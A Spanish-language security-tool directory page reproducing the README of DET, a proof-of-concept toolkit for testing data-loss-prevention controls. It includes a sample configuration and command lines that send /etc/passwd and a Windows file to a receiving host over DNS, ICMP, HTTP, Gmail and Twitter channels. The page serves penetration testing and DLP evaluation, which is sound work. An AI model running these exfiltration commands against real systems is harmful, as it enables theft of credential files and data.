Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
DET — (extensible) Kit de Exfiltración de Datos (DET) | Kitploit
Herramientas/GitHubGitHub/sensepost/det
Herramientas de Cifrado/DescifradoExfiltración de DatosSeguridad de RedesPruebas de PenetraciónRed TeamingAnálisis de DNS
GitHubsensepost/det

DET

(extensible) Kit de Exfiltración de Datos (DET)

Ver Repositorio
82119050hace 8 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

DET (extensible) Kit de Exfiltración de Datos

DET (se proporciona TAL CUAL), es una prueba de concepto para realizar Exfiltración de Datos usando uno o múltiples canales al mismo tiempo.

Esta es una Prueba de Concepto destinada a identificar posibles fallos de DLP. Nunca debe usarse para exfiltrar datos sensibles/vivos (por ejemplo, en una evaluación)

La idea era crear un kit de herramientas genérico para conectar cualquier tipo de protocolo/servicio y probar la configuración de soluciones de Monitoreo de Red y Prevención de Fugas de Datos (DLP) implementadas, contra diferentes técnicas de exfiltración de datos.

El repositorio principal se ha movido ahora a aquí.

Diapositivas

DET se presentó en BSides Ljubljana el 9 de marzo de 2016 y las diapositivas estarán disponibles aquí. Las diapositivas están disponibles aquí.

Ejemplo de uso (plugin ICMP)

Lado del servidor:

asciicast

Lado del cliente:

asciicast

Uso al combinar dos canales (Gmail/Twitter)

Lado del servidor:

asciicast

Lado del cliente:

asciicast

Instalación

Clona el repositorio:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

Luego:

root@kitploit:~
pip install -r requirements.txt --user

Configuración

Para usar DET, necesitarás configurarlo y agregar tus ajustes adecuados (por ejemplo, SMTP/IMAP, frase de cifrado AES256, etc.). Se ha proporcionado un archivo de ejemplo de configuración llamado: config-sample.json

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Uso

Ayuda de uso

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Lado del servidor:

Para cargar todos los plugins:

root@kitploit:~
python det.py -L -c ./config.json

Para cargar solo los módulos de twitter y gmail:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

Para cargar todos los plugins y excluir DNS:

root@kitploit:~
python det.py -L -c ./config.json -e dns

Lado del cliente:

Para cargar todos los plugins:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

Para cargar solo los módulos de twitter y gmail:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

Para cargar todos los plugins y excluir DNS:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

Y en PowerShell (módulo HTTP):

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Módulos

Hasta ahora, DET soporta múltiples protocolos, listados aquí:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (p. ej., Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

Y otros "servicios":

  • Google Docs (Sin autenticación)
  • Twitter (Mensajes directos)

Módulos experimentales

Hasta ahora, estoy ocupado implementando nuevos módulos que están casi listos para lanzar, incluyendo:

  • Skype (95% completado)
  • Tor (80% completado)
  • Github (30/40% completado)

Hoja de ruta

  • Agregar cifrado adecuado (p. ej., AES-256) Gracias a ryanohoro
  • Compresión (¡extremadamente importante!) Gracias a chokepoint
  • Ofuscación de datos adecuada e integración del Conjunto de Herramientas Cloakify
  • Módulos FTP, FlickR, Esteganografía LSB y Youtube

Referencias

Algunas referencias/créditos bastante interesantes de personas de las que me inspiré con su proyecto:

  • https://github.com/nullbind/Powershellery/ de Nullbind.
  • https://github.com/ytisf/PyExfil, verdaderamente impresionante.
  • https://github.com/m57/dnsteal de m57.
  • https://github.com/3nc0d3r/NaishoDeNusumu de 3nc0d3r.
  • https://github.com/glennzw/exphil de Glenn Wilkinson.
  • WebExfile de Saif El-Sherei

Contacto/Contribuciones

Puedes contactarme en Twitter @PaulWebSec. Siéntete libre de contribuir, clonar, bifurcar, enviar tu PR, etc.

Licencia

DET está licenciado bajo una Licencia MIT. Se pueden obtener permisos más allá del alcance de esta licencia en [email protected].

Descargar herramienta